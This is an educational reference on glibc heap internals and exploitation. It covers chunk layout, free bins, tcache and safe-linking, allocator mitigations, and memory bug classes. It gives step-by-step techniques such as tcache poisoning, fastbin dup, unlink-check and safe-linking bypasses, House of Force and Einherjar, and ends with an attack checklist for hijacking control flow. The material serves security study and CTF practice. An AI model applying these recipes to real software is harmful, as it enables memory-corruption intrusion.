bebop404

Heap Internals & Exploitation

Deep reference on glibc ptmalloc2: chunk layout, free bins, tcache, safe-linking, UAF, double-free, heap overflow, and modern exploitation techniques.

The heap is the primary arena for dynamic memory in C and C++ programs. Most exploitation techniques at the heap layer abuse the allocator's unconditional trust of its own metadata — a trust you can violate through out-of-bounds writes, use-after-free, or double-free bugs.

These notes focus on glibc ptmalloc2, the allocator on most Linux systems. Concepts carry over to jemalloc and tcmalloc with varying details.


Quick Reference

Chunk
Allocator unit: metadata header + user region
Bins
Free-list structures: tcache → fast → unsorted → small → large
Coalesce
Merging adjacent free chunks to fight fragmentation
UAF
Use-after-free: pointer used after the object was freed
Double Free
Freeing the same pointer twice → corrupted free list
Overflow
Writing past a chunk into the adjacent chunk's header
Unlink
Classic exploit: corrupt bin pointers → arbitrary write
Tcache
Per-thread cache in glibc ≥ 2.26; almost all small allocs hit this first

1. Chunk Anatomy

Heap chunk layout

Every malloc call returns a pointer into the user region of a chunk. Directly before that pointer sits the chunk header managed — and trusted — by the allocator.

In-use chunk layout

  (end of previous chunk's user data)
  ┌─────────────────────────────────────┐
  │  prev_size   (8 B)                  │  ← reused as user data when prev is in-use
  │  size | flags (8 B)                 │  ← size of THIS chunk; 3 flags in low bits
  ├─────────────────────────────────────┤  ← malloc() returns pointer HERE ↓
  │                                     │
  │       user data  (size − 16 B)      │
  │                                     │
  └─────────────────────────────────────┘
  (next chunk's prev_size starts here)

Free chunk — additional fields

  ┌─────────────────────────────────────┐
  │  prev_size   (8 B)                  │
  │  size | flags (8 B)                 │
  ├─────────────────────────────────────┤
  │  fd            → next free chunk    │
  │  bk            → prev free chunk    │
  │  fd_nextsize   (large bin only)     │
  │  bk_nextsize   (large bin only)     │
  └─────────────────────────────────────┘

Size flags (low 3 bits of size)

P bit 0PREV_INUSE — previous (lower) chunk is allocated; skip backward coalesceM bit 1IS_MMAPPED — chunk came from mmap(), not the heap arena; free() calls munmap()A bit 2NON_MAIN_ARENA — chunk belongs to a secondary thread arena
Key insight
Because the size field sits immediately before user data, even a one-byte overflow (e.g., writing a null terminator past a string buffer) can flip the PREV_INUSE bit of the next chunk, tricking the allocator into a dangerous backward consolidation.

2. Free Bins

After free(p), glibc places the chunk into one of five bin structures — checked in order during the next malloc:

Tcache ≥ glibc 2.26
  • Per-thread, no lock
  • 64 bins for sizes 24–1032 B (16-B steps)
  • Max 7 entries per bin (count enforced)
  • Singly linked — only fd
  • Checked first on both alloc and free
Fastbins
  • Sizes ≤ 64 B (default); up to 80 B
  • 10 singly-linked LIFO bins
  • No coalescing (speed trade-off)
  • Consolidated only on malloc_consolidate()
Unsorted Bin
  • Single circular doubly-linked list
  • First stop for non-fast freed chunks
  • Chunks sorted into small/large on the next malloc scan
Small Bins
  • 62 bins, sizes 16–504 B
  • Doubly-linked FIFO (exact-size match)
  • Chunks coalesce with neighbours on free
Large Bins
  • 63 bins for sizes ≥ 512 B
  • Doubly linked + size-sorted (best-fit)
  • Extra fd_nextsize / bk_nextsize skip-list chains
Top (Wilderness)
  • Last resort — extend heap via sbrk / mmap
  • Always at the high end of the arena
  • No prior free chunk to coalesce backwards with

malloc lookup order

malloc(n):
  1. tcache[size_class]     → O(1) thread-local pop              (≥ 2.26)
  2. fastbin[size_class]    → O(1) if size ≤ fast threshold
  3. small bin[size_class]  → exact fit, doubly-linked pop
  4. unsorted bin           → linear scan; splits oversized chunks
  5. large bin              → best-fit in a size-sorted list
  6. top chunk              → carve from wilderness, or sbrk/mmap

3. Tcache Deep Dive (glibc ≥ 2.26)

Tcache is a per-thread, lock-free singly-linked cache that makes small allocations near-free in latency. Its initial design lacked almost all integrity checks — making it the dominant exploitation target for several years.

Internal structures

typedef struct tcache_entry {
    struct tcache_entry *next;                /* singly linked */
    struct tcache_perthread_struct *key;      /* 2.29+: double-free canary */
} tcache_entry;
 
typedef struct tcache_perthread_struct {
    uint16_t counts[TCACHE_MAX_BINS];         /* entries per bin (max 7) */
    tcache_entry *entries[TCACHE_MAX_BINS];   /* head of each bin */
} tcache_perthread_struct;

The tcache_perthread_struct itself lives at the very start of the heap, allocated by malloc during thread initialisation. Corrupting it gives complete control over all future small allocations.

put / get (simplified)

static void tcache_put(mchunkptr chunk, size_t tc_idx) {
    tcache_entry *e = chunk2mem(chunk);
    e->key  = tcache;                        /* 2.29+: tag for double-free check */
    e->next = PROTECT_PTR(&e->next,          /* 2.32+: safe-linking              */
                          tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
}
 
static void *tcache_get(size_t tc_idx) {
    tcache_entry *e = tcache->entries[tc_idx];
    tcache->entries[tc_idx] = REVEAL_PTR(e->next);
    --(tcache->counts[tc_idx]);
    e->key = NULL;
    return (void *)e;
}

Safe-linking (glibc ≥ 2.32)

The next pointer stored in tcache (and fastbin) entries is XOR-mangled with a secret derived from its own storage address:

#define PROTECT_PTR(pos, ptr) \
    ((__typeof (ptr))((((size_t)(pos)) >> 12) ^ ((size_t)(ptr))))
#define REVEAL_PTR(ptr)  PROTECT_PTR(&ptr, ptr)

The slot address pos is right-shifted 12 bits (drops the page-offset) then XOR-ed with the pointer value. Forging a valid mangled pointer requires knowing the heap address of the slot — which demands a prior heap leak.

Bypass strategy
Read the next field of a freed chunk through a dangling pointer or OOB read — this leaks a mangled pointer. XOR it with slot_addr >> 12 to recover the raw heap address, then compute the correct mangled value for your forged pointer.

4. Allocator Mitigations

double-free key ≥ 2.29
tcache_entry.key is set to the tcache header pointer on free; if the same pattern is seen on re-entry, abort() is called.
safe-linking ≥ 2.32
tcache and fastbin next pointers are XOR'd with a slot-derived secret. Forging a pointer requires a heap address leak.
count check
tcache->counts[i] is incremented on put and decremented on get. Underflow or overflow triggers abort.
chunk alignment check
On tcache_get the returned pointer must be MIN_CHUNK_SIZE-aligned. Misalignment aborts.
fastbin double-free
Checks that the top-of-bin chunk ≠ the chunk being freed. Catches the immediate duplicate but not an A→B→A pattern.
unlink checks ≥ 2.3.4
Verifies fd->bk == chunk and bk->fd == chunk before relinking. Classic write-what-where now aborts unless you control both pointers.

5. Bug Classes

Uninitialized use

Reading fields of a freshly malloc'd object before writing them. Heap memory is not zeroed by malloc.

typedef struct { int len; char *buf; } Msg;
Msg *m = malloc(sizeof *m);
printf("%d\n", m->len);   // UB: reading stale bytes from a prior allocation
Impact
When stale bytes happen to be attacker-controlled leftovers from a previous allocation, this becomes a type confusion / stale-data disclosure primitive. Use calloc or explicit memset when zero-initialization matters.

Unchecked malloc return

char *p = malloc(n);
memcpy(p, src, n);    // segfault — or null-pointer write — if p == NULL

On modern Linux, mmap_min_addr prevents null-page mapping in userspace, so null-deref is typically a crash. In the kernel or embedded contexts it may be exploitable.

Use-after-free (UAF)

UAF diagram

char *a = malloc(16);
free(a);
a[2] = 0x41;          // UAF write — 'a' is now on the tcache free list

Timeline:

t0  malloc(16) → 0xADDR          allocate
t1  use(0xADDR)
t2  free(0xADDR)                  chunk goes to tcache/fastbin
t3  malloc(16) → 0xADDR          SAME region returned to a second caller
t4  a[2] = 0x41                   clobbers the second caller's object

Stack variant — use-after-return:

char *bad(void) {
    char local[16];
    return local;    // pointer to a stack frame that no longer exists
}
Primitives UAF enables

Type confusion — free object of type A, reallocate as type B at the same address, use A's dangling pointer to reach B's fields.
Pointer hijack — if the freed object contained a function pointer or vtable, overwrite it via the dangling pointer.
Metadata leak — freed chunk's fd/bk now hold heap (or libc) addresses; read them through the dangling pointer for a leak.

Double free

Double free diagram

free(p);
if (error_condition)
    free(p);   // double free — corrupts tcache / fastbin list

In tcache before glibc 2.29 (no key check), this directly creates a cycle:

tcache bin (size class): p → p → p → …   (self-referential)

malloc(sz) → p          (pop first entry)
malloc(sz) → p          (same address again — two owners of one allocation)
Prevention
After freeing, always set the pointer to NULLfree(NULL) is defined as a no-op. Adopt clear ownership semantics so exactly one code path frees each allocation.

Memory leak

for (int i = 0; i < N; i++) {
    char *buf = malloc(1 << 20);   // 1 MiB
    process(buf);
    /* forgot: free(buf) */
}
// RSS grows unbounded; heap becomes fragmented

Leaks rarely cause direct exploitability but degrade availability (OOM) and may let an attacker indirectly shape heap layout for later exploitation.

Heap overflow

Heap overflow case 1

Non-exploitable layout — overflow lands in the top chunk:

char *buf = malloc(1024);
strcpy(buf, argv[1]);   // overflow goes into wilderness; no free-list corruption

Heap overflow case 2

Exploitable layout — two adjacent allocations:

char *buf  = malloc(1024);
char *buf2 = malloc(1024);   // typically placed immediately after buf
strcpy(buf, argv[1]);        // overflow lands on buf2's chunk header
free(buf2);                  // allocator consults the corrupted header

What even a single-byte overflow can achieve:

  • Flip PREV_INUSE → trigger false backward consolidation
  • Overwrite size → misalign future allocations
  • Plant fake fd/bk → write-what-where on unlink (older glibc)

6. Exploitation Techniques

Precondition: Heap overflow into a free chunk's fd/bk fields.

Forge Y.fd = &WRITEVAL
Forge Y.bk = &TARGET − 0x10   (so bk→fd lands on TARGET)

unlink(Y):
  fd→bk = bk    →  *(TARGET)      = WRITEVAL   ← arbitrary write
  bk→fd = fd    →  *(WRITEVAL+8)  = &TARGET-8

A write-what-where primitive. Patched in glibc 2.3.4 with the consistency check fd→bk == chunk && bk→fd == chunk.

Bypass (still works)
If you control a global/stack pointer P that holds the address of the fake chunk, set fd = P − 0x18, bk = P − 0x10. Then fd→bk and bk→fd both resolve to the fake chunk, passing the check.

Fastbin Corruption

Precondition: UAF or double-free on a fastbin-sized chunk.

Step 1   free(A)        → fastbin: [ A → NULL ]
Step 2   free(A) again  → fastbin: [ A → A ]   (old glibc: only checks top-of-bin ≠ A)
Step 3   malloc(sz)     → returns A; write A.fd = FAKE − 8
Step 4   malloc(sz)     → returns A again (drain)
Step 5   malloc(sz)     → returns FAKE   (allocator treats FAKE as a valid chunk)

Use step 5 to write into FAKE — typically __malloc_hook, __free_hook, or a GOT entry.

Tcache Dup / Poisoning

Before glibc 2.32 (no safe-linking):

free(A)              → tcache: [ A ]
free(A)              → tcache: [ A → A ]
malloc(sz) → A       write A->next = &TARGET
malloc(sz) → A       (drain the duplicate)
malloc(sz) → TARGET  allocator hands us the target address as "fresh" memory

With safe-linking (≥ 2.32), step 3 requires a mangled pointer:

size_t slot = (size_t)&A->next;
A->next = (tcache_entry *)((slot >> 12) ^ (size_t)&TARGET);

Which requires &A->next — obtained from a heap address leak.

House of Force (pre-glibc 2.29)

Precondition: Overflow into the top chunk's size field.

1.  Overwrite top->size = 0xffffffffffffffff
2.  malloc(req) where req wraps 64-bit arithmetic to place the new
    top pointer at TARGET − 2*sizeof(size_t)
3.  The following malloc(any) returns TARGET — arbitrary allocation

Mitigated in glibc 2.29: top chunk size is sanity-checked against arena bounds.

House of Einherjar

Precondition: Off-by-one null-byte overflow into the low byte of the next chunk's size (clearing PREV_INUSE) and the ability to forge a fake free chunk somewhere in memory.

1.  Plant fake chunk header at address FAKE
2.  Off-by-one: clear PREV_INUSE of next chunk; set its prev_size = distance to FAKE
3.  free(next chunk)  →  backward consolidate lands at FAKE
4.  malloc(N)         →  returns chunk overlapping FAKE + live adjacent object
    (overlap gives read/write over the adjacent object)

Heap Spray

Allocate many same-size objects to deterministically fill bins and predict heap layout:

void *spray[256];
for (int i = 0; i < 256; i++)
    spray[i] = malloc(sz);          // fill tcache + fastbins
for (int i = 0; i < 256; i++)
    free(spray[i]);                 // drain — next alloc is at a known address

Turns a probabilistic exploit into a reliable one. Essential when ASLR is active.


7. Tooling

Valgrind / memcheck
UAF, double-free, uninitialized reads, leaks — all with full stack traces. ~20–30× slowdown.
valgrind --leak-check=full ./bin
AddressSanitizer (ASan)
~2× slowdown. Catches overflows, UAF, double-free via red-zone shadow memory. Best for fuzzing.
-fsanitize=address,undefined -g
pwndbg
GDB plugin with heap-aware commands for live inspection of arenas, bins, chunks.
heap / bins / vis_heap_chunks
malloc_stats / mallinfo2
Runtime arena statistics from within the process. Useful for spotting leaks in long-running services.
malloc_stats(); /* writes to stderr */
libdislocator
AFL allocator that places each allocation at a page boundary — any overflow immediately segfaults.
LD_PRELOAD=libdislocator.so ./bin
heapinfo (pwndbg)
Dumps all bin counts, tcache contents, and arena state in a single command.
pwndbg> heapinfo

Essential pwndbg commands

heap                     walk all chunks in the main arena
bins                     show fastbins, unsorted, small, large bins
tcachebins               dump per-thread tcache entries + counts
vis_heap_chunks N        color-coded visual map of N chunks
find_fake_fast ADDR      find memory that looks like a valid fastbin chunk
malloc_chunk ADDR        parse chunk header at ADDR
try_free ADDR            simulate a free() call to check what glibc would do

Attack Checklist

  1. Identify the primitive — overflow / UAF / double-free / type confusion
  2. Leak addresses — read a freed chunk's fd/bk (unsorted bin → libc leak) or a tcache pointer (heap leak)
  3. Shape the heap — spray/drain to control chunk adjacency and bin state
  4. Corrupt a free-list pointer — redirect the next allocation to a target region (GOT, hook, vtable)
  5. Write your payload — overwrite __free_hook, __malloc_hook, a GOT entry, or a C++ vtable pointer
  6. Trigger — call the overwritten hook/function to gain control flow